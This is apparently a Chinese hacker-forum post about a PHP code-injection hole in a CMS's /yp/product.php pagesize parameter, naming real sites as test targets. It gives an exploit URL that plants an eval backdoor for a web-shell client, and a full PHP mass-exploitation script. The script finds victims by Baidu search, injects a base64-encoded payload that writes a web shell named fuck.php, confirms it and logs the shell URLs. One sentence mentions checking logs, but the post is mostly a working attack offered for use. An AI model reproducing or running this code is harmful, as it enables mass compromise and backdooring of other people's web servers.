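玩也玩够了,这个洞有点鸡肋:部分站点会提示“此模板没安装”等情况。既然已经有人发出来了,那老衲也发吧。谷歌批量还需改进,一会儿会补上! 原文: http://www.wooyun.org/bug.php?action=view&id=2984 测试如下: http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()} 测试结果: http://www.cnqiyou.com/yp/product.php?pagesize=${@phpinfo()} 说明:若响应中出现 phpinfo() 的输出,即表明 pagesize 参数的值被服务端当作 PHP 代码执行;具体成因与修复方式请以原文为准。排查时可在 Web 访问日志中检索 /yp/product.php 请求里 pagesize 参数含 “${” 的记录。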
EXP: http://www.cnqiyou.com/yp/product.php?pagesize=${${@eval%28$_POST[cmd]%29}} 直接菜刀链接 https://www.ogeek.net/softs/163997.html 批量EXP: PS:根据百度搜索批量 复制代码 代码如下:<?php error_reporting(E_ERROR); set_time_limit(0);</p> <p>$keyword='inurl:about/joinus' ; // 批量关键字 $timeout = 1; $stratpage = 1; $lastpage = 10000000; for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $array=ReadBaiduList($keyword,$timeout,$i); foreach ($array as $url ){ $url_list=file('url.txt'); if (in_array("$url\r\n",$url_list)){ echo "[-] Links repeat\n"; }else{ $fp = @fopen('url.txt', 'a'); @fwrite($fp, $url."\r\n"); @fclose($fp); print_r(" [-] Get ...... $url\r\n"); if(okbug($url)){ $exploit=exploit($url);</p> <p>$ors=okor($url); if ($ors){ echo "[*] Shell:-> ".$url."/yp/fuck.php\n"; $fp = @fopen('shell.txt', 'a'); @fwrite($fp, $url."/yp/fuck.php\r\n"); @fclose($fp); } }else{ print "[-] No Bug!\n"; } } } }</p> <p>function exploit($url){ $host=$url; $port="80"; $content <a href="mailto:='a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7'">='a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7'</a>; $data = 'POST <a>/yp/product.php?pagesize=${${@eval%28$_POST[a]%29</a>}} HTTP/1.1'."\r\n"; $data .= "X-Forwarded-For: 199.1.88.29\r\n"; $data .= "Referer: <a href="http://$host\r\n">http://$host\r\n</a>"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n"; $data .= "Host: $host\r\n"; 
$data .= "Content-Length: ".strlen($content)."\r\n"; $data .= "Cache-Control: no-cache\r\n\r\n"; $data .= $content."\r\n"; $ock=fsockopen($host,$port); if (!$ock) { echo "[*] No response from $host\n"; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } }</p> <p>function okor($host){ $tmp = array(); $data = ''; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,"GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n"); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if (strpos($data, '200') !== false) { return true; }else{ return false; } } function okbug($host){ $tmp = array(); $data = ''; $fp = @fsockopen($host,80,$errno,$errstr,60); @fputs($fp,'GET /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1'."\r\nHost:$host\r\nConnection: Close\r\n\r\n"); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); if(preg_match('/(php.ini)/i',$data)) { return true; }else{ return false; } }</p> <p>function ReadBaiduList($keyword,$timeout,$nowpage) { $tmp = array(); //$data = ''; $nowpage = ($nowpage-1)*10; $fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout); @fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1\r\nHost:[url]www.baidu.com[/url]\r\nConnection: Close\r\n\r\n"); while ($fp && !feof($fp)) $data .= fread($fp, 1024); @fclose($fp); preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode('/',$tmp[1][$i]); $array[] = str_replace('http://','',$row[0]); } return $array; } ?> |